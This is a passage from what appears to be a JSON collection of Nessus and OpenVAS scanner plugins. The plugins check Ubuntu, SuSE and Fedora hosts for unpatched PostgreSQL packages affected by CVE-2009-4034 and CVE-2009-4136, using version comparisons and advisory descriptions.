flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql-server-dev-8.3\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libecpg-compat3\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libecpg-dev\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libecpg6\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpgtypes3\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpq-dev\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpq5\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql-8.3\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql-client\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql-client-8.3\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql-contrib\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql-contrib-8.3\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql-doc\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql-doc-8.3\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql-plperl-8.3\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql-plpython-8.3\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql-pltcl-8.3\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"postgresql-server-dev-8.3\", pkgver:\"8.3.9-0ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libecpg-compat3\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libecpg-dev\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libecpg6\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpgtypes3\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpq-dev\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpq5\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql-8.3\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql-client\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql-client-8.3\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql-contrib\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql-contrib-8.3\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql-doc\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql-doc-8.3\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql-plperl-8.3\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql-plpython-8.3\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql-pltcl-8.3\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"postgresql-server-dev-8.3\", pkgver:\"8.3.9-0ubuntu9.04\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libecpg-compat3\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libecpg-dev\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libecpg6\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpgtypes3\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpq-dev\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpq5\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql-8.4\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql-client\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql-client-8.4\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql-contrib\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql-contrib-8.4\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql-doc\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql-doc-8.4\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql-plperl-8.4\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql-plpython-8.4\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql-pltcl-8.4\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"postgresql-server-dev-8.4\", pkgver:\"8.4.2-0ubuntu9.10\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libecpg-compat2 / libecpg-compat3 / libecpg-dev / libecpg5 / etc\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:18:03", "bulletinFamily": "scanner", "description": "The version of PostgreSQL installed on the remote host is 7.4 prior to 7.4.27, 8.0 prior to 8.0.23, 8.1 prior to 8.1.19, 8.2 prior to 8.2.15, 8.3 prior to 8.3.9 or 8.4 prior to 8.4.2. As such, it is potentially affected by multiple vulnerabilities :\n\n - NULL bytes in SSL Certificates can be used to falsify client or server authentication. (CVE-2009-4034)\n\n - Privilege escalation is possible via changing session state in an index function. (CVE-2009-4136)", "modified": "2018-11-15T00:00:00", "id": "POSTGRESQL_20091214.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63348", "published": "2012-12-28T00:00:00", "title": "PostgreSQL 7.4 < 7.4.27 / 8.0 < 8.0.23 / 8.1 < 8.1.19 / 8.2 < 8.2.15 / 8.3 < 8.3.9 / 8.4 < 8.4.2 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63348);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:21\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_bugtraq_id(37333, 37334);\n\n script_name(english:\"PostgreSQL 7.4 < 7.4.27 / 8.0 < 8.0.23 / 8.1 < 8.1.19 / 8.2 < 8.2.15 / 8.3 < 8.3.9 / 8.4 < 8.4.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PostgreSQL\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of PostgreSQL installed on the remote host is 7.4 prior to\n7.4.27, 8.0 prior to 8.0.23, 8.1 prior to 8.1.19, 8.2 prior to 8.2.15,\n8.3 prior to 8.3.9 or 8.4 prior to 8.4.2. As such, it is potentially\naffected by multiple vulnerabilities :\n\n - NULL bytes in SSL Certificates can be used to falsify \n client or server authentication. (CVE-2009-4034)\n\n - Privilege escalation is possible via changing session\n state in an index function. (CVE-2009-4136)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.postgresql.org/about/news/1170/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.postgresql.org/docs/7.4/release-7-4-27.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.postgresql.org/docs/8.0/release-8-0-23.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.postgresql.org/docs/8.1/release-8-1-19.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.postgresql.org/docs/8.2/release-8-2-15.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.postgresql.org/docs/8.3/release-8-3-9.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.postgresql.org/docs/8.4/release-8-4-2.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PostgreSQL 7.4.27 / 8.0.23 / 8.1.19 / 8.2.15 / 8.3.9 / 8.4.2\nor later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:postgresql:postgresql\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"postgresql_version.nbin\");\n script_require_ports(\"Services/postgresql\", 5432);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"backport.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_service(svc:\"postgresql\", default:5432, exit_on_fail:TRUE);\n\nversion = get_kb_item_or_exit('database/'+port+'/postgresql/version');\nsource = get_kb_item_or_exit('database/'+port+'/postgresql/source');\ndatabase = get_kb_item('database/'+port+'/postgresql/database_name');\n\nget_backport_banner(banner:source);\nif (backported && report_paranoia < 2) audit(AUDIT_BACKPORT_SERVICE, port, 'PostgreSQL server');\n\nver = split(version, sep:'.');\nfor (i=0; i < max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n (ver[0] == 7 && ver[1] == 4 && ver[2] < 27) ||\n (ver[0] == 8 && ver[1] == 0 && ver[2] < 23) ||\n (ver[0] == 8 && ver[1] == 1 && ver[2] < 19) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 15) ||\n (ver[0] == 8 && ver[1] == 3 && ver[2] < 9) ||\n (ver[0] == 8 && ver[1] == 4 && ver[2] < 2) \n)\n{\n if (report_verbosity > 0)\n {\n report = '';\n if(database)\n report += '\\n Database name : ' + database;\n report +=\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 7.4.27 / 8.0.23 / 8.1.19 / 8.2.15 / 8.3.9 / 8.4.2\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, 'PostgreSQL', port, version);\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:12:59", "bulletinFamily": "scanner", "description": "The following bugs have been fixed :\n\nAn unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions. (CVE-2009-4136)\n\nEmbedded null bytes in the common name of SSL certificates could bypass certificate hostname checks. (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "modified": "2012-05-17T00:00:00", "id": "SUSE_POSTGRESQL-6767.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44056", "published": "2010-01-19T00:00:00", "title": "SuSE 10 Security Update : PostgreSQL (ZYPP Patch Number 6767)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44056);\n script_version (\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2012/05/17 11:20:15 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"SuSE 10 Security Update : PostgreSQL (ZYPP Patch Number 6767)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following bugs have been fixed :\n\nAn unprivileged, authenticated PostgreSQL user could create a table\nwhich references functions with malicious content. Maintenance\noperations carried out be the database superuser could execute such\nfunctions. (CVE-2009-4136)\n\nEmbedded null bytes in the common name of SSL certificates\ncould bypass certificate hostname checks. (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4136.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6767.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"postgresql-devel-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"postgresql-libs-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-contrib-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-devel-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-docs-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-libs-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-pl-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-server-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.1.19-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:12:59", "bulletinFamily": "scanner", "description": "The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "modified": "2012-04-23T00:00:00", "id": "SUSE9_12571.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44050", "published": "2010-01-19T00:00:00", "title": "SuSE9 Security Update : PostgreSQL (YOU Patch Number 12571)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44050);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2012/04/23 18:21:33 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"SuSE9 Security Update : PostgreSQL (YOU Patch Number 12571)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could\n create a table which references functions with malicious\n content. Maintenance operations carried out be the\n database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL\n certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4136.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12571.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-contrib-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-devel-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-docs-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-libs-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-pl-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-server-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"postgresql-libs-32bit-9-201001081716\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-25T10:57:11", "bulletinFamily": "scanner", "description": "The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13363.", "modified": "2017-07-10T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66566", "id": "OPENVAS:66566", "title": "Fedora Core 11 FEDORA-2009-13363 (postgresql)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13363.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13363 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to latest upstream point releases\n\nChangeLog:\n\n* Wed Dec 16 2009 Tom Lane 8.3.9-1\n- Update to PostgreSQL 8.3.9, for various fixes described at\nhttp://www.postgresql.org/docs/8.3/static/release-8-3-9.html\nincluding two security issues\nRelated: #546321\nRelated: #547662\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update postgresql' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13363\";\ntag_summary = \"The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13363.\";\n\n\n\nif(description)\n{\n script_id(66566);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4136\", \"CVE-2009-4034\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-13363 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=546321\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=547662\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plperl\", rpm:\"postgresql-plperl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plpython\", rpm:\"postgresql-plpython~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pltcl\", rpm:\"postgresql-pltcl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") 